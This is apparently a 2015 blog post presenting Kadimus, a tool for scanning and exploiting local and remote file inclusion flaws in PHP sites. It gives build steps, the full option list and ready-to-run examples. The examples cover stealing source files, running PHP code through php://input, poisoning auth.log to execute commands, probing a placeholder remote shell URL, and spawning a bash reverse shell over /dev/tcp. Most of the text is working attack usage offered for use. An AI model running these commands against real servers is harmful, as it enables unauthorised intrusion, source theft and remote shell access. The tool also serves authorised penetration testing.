Kadimus For LFI / RFI Scan And Exploit Tool

~ samedi 21 mars 2015

Kadimus For LFI / RFI Scan And Exploit Tool


Installing libcurl:

# yum install libcurl-devel

Debian based
# apt-get install libcurl4-openssl-dev

Installing libpcre:

# yum install libpcre-devel

Debian based
# apt-get install libpcre3-dev

Installing libssh:

# yum install libssh-devel

Debian based
# apt-get install libssh-dev

And finally:
$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make

  -h, --help                    Display this help menu

   -B, --cookie STRING         Set custom HTTP Cookie header
   -A, --user-agent STRING     User-Agent to send to server
   --connect-timeout SECONDS   Maximum time allowed for connection
 --retry-times NUMBER        number of times to retry if connection fails

    -u, --url STRING             Single URI to scan
    -U, --url-list FILE         File contains URIs to scan
    -o, --output FILE           File to save output results
    --threads NUMBER                      Number of threads (2..1000)

    -t, --target STRING         Vulnerable Target to exploit
    --injec-at STRING           Parameter name to inject exploit
                                                  (only need with RCE data and source disclosure)
 -X, --rce-technique=TECH    LFI to RCE technique to use
   -C, --code STRING           Custom PHP code to execute, with php brackets
   -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                       Simple command shell interface through HTTP Request

   -r, --reverse-shell         Try spawn a reverse shell connection.
  -l, --listen NUMBER         port to listen

   -b, --bind-shell              Try connect to a bind-shell
    -i, --connect-to STRING            Ip/Hostname to connect
    -p, --port NUMBER           Port number to connect

   --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)
   --ssh-target STRING      Set the SSH Host (Default: Target URI hostname)

RCE Available techniques

      environ         Try run PHP Code using /proc/self/environ
      input             Try run PHP Code using php://input
      auth               Try run PHP Code using /var/log/auth.log
      data               Try run PHP Code using data://text

Source Disclosure:
      -G, --get-source          Try get the source files using filter://
   -f, --filename STRING     Set filename to grab source [REQUIRED]
   -O FILE                   Set output file (Default: stdout)


./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get source code of file:

./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg

Execute php code:

./kadimus -t localhost/?pg=php://input%00 -C '' -X input

Execute command:

./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:

You can also check for RFI errors, just put the remote url on resource/common_files.txt and the regex to identify this, example:

/* http://bad-url.com/shell.txt */

in file:

http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell:

./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/ 0>&1' --retry-times 0

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